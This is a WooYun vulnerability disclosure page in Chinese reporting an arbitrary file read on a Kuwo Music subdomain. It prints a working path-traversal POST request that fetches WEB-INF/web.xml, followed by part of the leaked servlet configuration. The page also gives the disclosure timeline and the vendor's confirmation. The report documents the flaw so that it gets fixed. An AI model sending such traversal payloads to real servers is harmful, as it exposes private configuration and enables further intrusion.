当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099317

漏洞标题:酷我音乐某站任意文件读取

相关厂商:酷我音乐

漏洞作者: Forever80s

提交时间:2015-03-03 20:46

修复时间:2015-04-17 20:48

公开时间:2015-04-17 20:48

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-03: 细节已通知厂商并且等待厂商处理中
2015-03-04: 厂商已经确认,细节仅向厂商公开
2015-03-14: 细节向核心白帽子及相关领域专家公开
2015-03-24: 细节向普通白帽子公开
2015-04-03: 细节向实习白帽子公开
2015-04-17: 细节向公众公开

简要描述:

详细说明:

漏洞证明:

网站:mc.kuwo.cn
任意文件读取遍历,我们来读取web.xml

POST /g/st/WulinLogin HTTP/1.1
Referer: http://mc.kuwo.cn/g/jsp/mingchao/zc.jsp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
X-Forwarded-For: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Host: mc.kuwo.cn
Content-Length: 65
Accept-Encoding: gzip, deflate
fromwhere=..%2fWEB-INF%2fweb.xml%3bx%3d&username=&password=&code=


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 21 Feb 2015 11:34:40 GMT
Content-Type: application/xml;charset=utf-8
Content-Length: 173237
Connection: keep-alive
Last-Modified: Thu, 05 Feb 2015 03:46:27 GMT
X-Cache: MISS from 74localhost.localdomain
Vary: Accept-Encoding
<?xml version="1.0" encoding="UTF-8"?>
<web-app version="2.4"
xmlns="http://java.sun.com/xml/ns/j2ee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd">
<!--
<servlet>
<servlet-name>jsp</servlet-name>
<servlet-class>org.apache.jasper.servlet.JspServlet</servlet-class>
<init-param>
<param-name>fork</param-name>
<param-value>false</param-value>
</init-param>
<init-param>
<param-name>xpoweredBy</param-name>
<param-value>false</param-value>
</init-param>
<init-param>
<param-name>trimSpaces</param-name>
<param-value>true</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
-->
<servlet>
<description>JumpDiguoServlet</description>
<display-name>JumpDiguoServlet</display-name>
<servlet-name>JumpDiguoServlet</servlet-name>
<servlet-class>com.koowo.game.w51wan.diguo.JumpDiguoServlet</servlet-class>
</servlet>
<servlet>
<description>JumpLuanwuServlet</description>
<display-name>JumpLuanwuServlet</display-name>
<servlet-name>JumpLuanwuServlet</servlet-name>
<servlet-class>com.koowo.game.w51wan.luanwu.JumpLuanwuServlet</servlet-class>
</servlet>
<servlet>
<description>InitServlet</description>
<display-name>InitServlet</display-name>
<servlet-name>InitServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.InitServlet</servlet-class>
</servlet>
<servlet>
<description>JumpQilongServlet</description>
<display-name>JumpQilongServlet</display-name>
<servlet-name>JumpQilongServlet</servlet-name>
<servlet-class>com.koowo.game.duniu.qilong.JumpQilongServlet</servlet-class>
</servlet>
<servlet>
<description>UserLogin51wanServelt</description>
<display-name>UserLogin51wanServelt</display-name>
<servlet-name>UserLogin51wanServelt</servlet-name>
<servlet-class>com.koowo.game.w51wan.UserLogin51wanServelt</servlet-class>
</servlet>
<servlet>
<description>IndexServlet</description>
<display-name>IndexServlet</display-name>
<servlet-name>IndexServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.IndexServlet</servlet-class>
</servlet>
<servlet>
<description>AllAn</description>
<display-name>AllAn</display-name>
<servlet-name>AllAn</servlet-name>
<servlet-class>com.koowo.game.servlet.AllAnServlet</servlet-class>
</servlet>
<servlet>
<description>GameAn</description>
<display-name>GameAn</display-name>
<servlet-name>GameAn</servlet-name>
<servlet-class>com.koowo.game.servlet.GameAnServlet</servlet-class>
</servlet>
<servlet>
<description>An</description>
<display-name>An</display-name>
<servlet-name>AnServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.AnServlet</servlet-class>
</servlet>
<servlet>
<description>AllGame</description>
<display-name>AllGame</display-name>
<servlet-name>AllGameServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.AllGameServlet</servlet-class>
</servlet>
<servlet>
<description>Game</description>
<display-name>Game</display-name>
<servlet-name>GameServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.GameServlet</servlet-class>
</servlet>
<servlet>
<description>JumpSanguoServlet</description>
<display-name>JumpSanguoServlet</display-name>
<servlet-name>JumpSanguoServlet</servlet-name>
<servlet-class>com.koowo.game.kunlun.sanguo.JumpSanguoServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>JumpJianxia</servlet-name>
<servlet-class>com.koowo.game.w51wan.jianxia.JumpJianxiaServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>JumpWulinServlet</servlet-name>
<servlet-class>com.koowo.game.w9wee.wulin.JumpWulinServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>wulinIndexServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.wulin.IndexServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>AllNewsServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.AllNewsServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>FresherGuideServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.FresherGuideServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>ZiLiaoServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.ZiLiaoServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>DirectSignServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.DirectSignServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>ShowContentServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.ShowContentServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>NewIndexServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.NewIndexServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>EntryServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.EntryServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>WulinLoginServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.wulin.WulinLoginServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>CheckUserNameServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.CheckUserNameServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>HuoDongServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.HuoDongServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>GongLueServlet</servlet-name>
<servlet-class>com.koowo.game.servlet.GongLueServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>rexueIndexServlet</servlet-name>
敏感省略。。。


可遍历

修复方案:

版权声明:转载请注明来源 Forever80s@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-03-04 09:43

厂商回复:

多谢对酷我的支持

最新状态:

暂无


漏洞评价:

评论

  1. 2015-03-03 21:14 | 爱上平顶山 认证白帽子 ( 核心白帽子 | Rank:2738 漏洞数:547 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

    精力旺盛啊